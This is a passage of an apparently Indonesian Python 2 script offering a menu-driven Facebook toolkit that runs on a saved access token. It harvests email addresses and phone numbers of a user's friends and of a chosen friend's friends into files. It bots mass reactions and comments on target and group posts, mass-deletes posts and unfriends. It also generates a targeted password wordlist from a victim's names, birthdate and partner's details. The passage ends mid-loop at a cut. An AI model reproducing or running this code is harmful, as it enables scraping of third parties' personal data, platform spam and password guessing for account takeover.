raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def email():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
em.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(em)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(mails)
print '\x1b[1;91m[!] An error occurred'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def emailfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
emfromfriends.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(emfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def nomor_hp():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
url = 'https://graph.facebook.com/me/friends?access_token=' + toket
r = requests.get(url)
z = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for n in z['data']:
x = requests.get('https://graph.facebook.com/' + n['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hp.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Phone\x1b[1;96m%s' % len(hp)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(noms)
print '\x1b[1;91m[!] An error occurred '
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def hpfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput Friends ID \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hpfromfriends.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal number\x1b[1;96m%s' % len(hpfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Make file failed'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def menu_bot():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Bot Reactions Target Post'
print '║-> \x1b[1;37;40m2. Bot Reactions Group Post'
print '║-> \x1b[1;37;40m3. Bot Comment Target Post'
print '║-> \x1b[1;37;40m4. Bot Comment Group Post'
print '║-> \x1b[1;37;40m5. Mass Delete Post'
print '║-> \x1b[1;37;40m6. Accept Friend Requests'
print '║-> \x1b[1;37;40m7. Unfriends'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
bot_pilih()
def bot_pilih():
bots = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if bots == '':
print '\x1b[1;91m[!] Can\'t empty'
bot_pilih()
else:
if bots == '1':
menu_react()
else:
if bots == '2':
grup_react()
else:
if bots == '3':
bot_komen()
else:
if bots == '4':
grup_komen()
else:
if bots == '5':
deletepost()
else:
if bots == '6':
accept()
else:
if bots == '7':
unfriend()
else:
if bots == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + bots + ' \x1b[1;91mnot found'
bot_pilih()
def menu_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. \x1b[1;97mLike'
print '║-> \x1b[1;37;40m2. \x1b[1;97mLove'
print '║-> \x1b[1;37;40m3. \x1b[1;97mWow'
print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha'
print '║-> \x1b[1;37;40m5. \x1b[1;97mSad'
print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
react_pilih()
def react_pilih():
global tipe
aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Can\'t empty'
react_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
react()
else:
if aksi == '2':
tipe = 'LOVE'
react()
else:
if aksi == '3':
tipe = 'WOW'
react()
else:
if aksi == '4':
tipe = 'HAHA'
react()
else:
if aksi == '5':
tipe = 'SAD'
react()
else:
if aksi == '6':
tipe = 'ANGRY'
react()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found'
react_pilih()
def react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
try:
oh = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksi.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksi))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def grup_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. \x1b[1;97mLike'
print '║-> \x1b[1;37;40m2. \x1b[1;97mLove'
print '║-> \x1b[1;37;40m3. \x1b[1;97mWow'
print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha'
print '║-> \x1b[1;37;40m5. \x1b[1;97mSad'
print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
reactg_pilih()
def reactg_pilih():
global tipe
aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Can\'t empty'
reactg_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
reactg()
else:
if aksi == '2':
tipe = 'LOVE'
reactg()
else:
if aksi == '3':
tipe = 'WOW'
reactg()
else:
if aksi == '4':
tipe = 'HAHA'
reactg()
else:
if aksi == '5':
tipe = 'SAD'
reactg()
else:
if aksi == '6':
tipe = 'ANGRY'
reactg()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found'
reactg_pilih()
def reactg():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name']
try:
oh = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksigrup.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksigrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def bot_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mUse \x1b[1;97m'<>' \x1b[1;92m for newline"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
p = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komen.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komen))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def grup_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mGunakan \x1b[1;97m'<>' \x1b[1;92mUntuk Baris Baru"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
p = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komengrup.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komengrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def deletepost():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
nam = requests.get('https://graph.facebook.com/me?access_token=' + toket)
lol = json.loads(nam.text)
nama = lol['name']
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mFrom \x1b[1;91m: \x1b[1;97m%s' % nama
jalan('\x1b[1;91m[+] \x1b[1;92mStarting remove status\x1b[1;97m ...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
asu = requests.get('https://graph.facebook.com/me/feed?access_token=' + toket)
asus = json.loads(asu.text)
for p in asus['data']:
id = p['id']
piro = 0
url = requests.get('https://graph.facebook.com/' + id + '?method=delete&access_token=' + toket)
ok = json.loads(url.text)
try:
error = ok['error']['message']
print '\x1b[1;91m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;91m] \x1b[1;95mFailed'
except TypeError:
print '\x1b[1;92m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;92m] \x1b[1;96mRemoved'
piro += 1
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Connection Error'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def accept():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
r = requests.get('https://graph.facebook.com/me/friendrequests?limit=' + limit + '&access_token=' + toket)
friends = json.loads(r.text)
if '[]' in str(friends['data']):
print '\x1b[1;91m[!] No friends request'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in friends['data']:
gas = requests.post('https://graph.facebook.com/me/friends/' + i['from']['id'] + '?access_token=' + toket)
a = json.loads(gas.text)
if 'error' in str(a):
print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;91m Failed'
print 52 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;92m Berhasil'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def unfriend():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;97mStop \x1b[1;91mCTRL+C'
print
try:
pek = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(pek.text)
for i in cok['data']:
nama = i['name']
id = i['id']
requests.delete('https://graph.facebook.com/me/friends?uid=' + id + '&access_token=' + toket)
print '\x1b[1;97m[\x1b[1;92mRemove\x1b[1;97m] ' + nama + ' => ' + id
except IndexError:
pass
except KeyboardInterrupt:
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def lain():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Write Status'
print '║-> \x1b[1;37;40m2. Make Wordlist'
print '║-> \x1b[1;37;40m3. Account Checker'
print '║-> \x1b[1;37;40m4. List Group'
print '║-> \x1b[1;37;40m5. Profile Guard'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
pilih_lain()
def pilih_lain():
other = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if other == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih_lain()
else:
if other == '1':
status()
else:
if other == '2':
wordlist()
else:
if other == '3':
check_akun()
else:
if other == '4':
grupsaya()
else:
if other == '5':
guard()
else:
if other == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + other + ' \x1b[1;91mnot found'
pilih_lain()
def status():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
msg = raw_input('\x1b[1;91m[+] \x1b[1;92mWrite status \x1b[1;91m:\x1b[1;97m ')
if msg == '':
print '\x1b[1;91m[!] Can\'t empty'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
res = requests.get('https://graph.facebook.com/me/feed?method=POST&message=' + msg + '&access_token=' + toket)
op = json.loads(res.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mStatus ID\x1b[1;91m : \x1b[1;97m' + op['id']
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def wordlist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi data lengkap target dibawah'
print 52 * '\x1b[1;97m\xe2\x95\x90'
a = raw_input('\x1b[1;91m[+] \x1b[1;92mName Depan \x1b[1;97m: ')
file = open(a + '.txt', 'w')
b = raw_input('\x1b[1;91m[+] \x1b[1;92mName Tengah \x1b[1;97m: ')
c = raw_input('\x1b[1;91m[+] \x1b[1;92mName Belakang \x1b[1;97m: ')
d = raw_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan \x1b[1;97m: ')
e = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
f = e[0:2]
g = e[2:4]
h = e[4:]
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;93mKalo Jomblo SKIP aja :v'
i = raw_input('\x1b[1;91m[+] \x1b[1;92mName Pacar \x1b[1;97m: ')
j = raw_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan Pacar \x1b[1;97m: ')
k = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir Pacar >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
l = k[0:2]
m = k[2:4]
n = k[4:]
file.write('%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s' % (a, c, a, b, b, a, b, c, c, a, c, b, a, a, b, b, c, c, a, d, b, d, c, d, d, d, d, a, d, b, d, c, a, e, a, f, a, g, a, h, b, e, b, f, b, g, b, h, c, e, c, f, c, g, c, h, d, e, d, f, d, g, d, h, e, a, f, a, g, a, h, a, e, b, f, b, g, b, h, b, e, c, f, c, g, c, h, c, e, d, f, d, g, d, h, d, d, d, a, f, g, a, g, h, f, g, f, h, f, f, g, f, g, h, g, g, h, f, h, g, h, h, h, g, f, a, g, h, b, f, g, b, g, h, c, f, g, c, g, h, d, f, g, d, g, h, a, i, a, j, a, k, i, e, i, j, i, k, b, i, b, j, b, k, c, i, c, j, c, k, e, k, j, a, j, b, j, c, j, d, j, j, k, a, k, b, k, c, k, d, k, k, i, l, i, m, i, n, j, l, j, m, j, n, j, k))
wg = 0
while wg < 100:
wg = wg + 1
file.write(a + str(wg) + '\n')
en = 0
while en < 100:
en = en + 1
file.write(i + str(en) + '\n')
word = 0
while word < 100:
word = word + 1
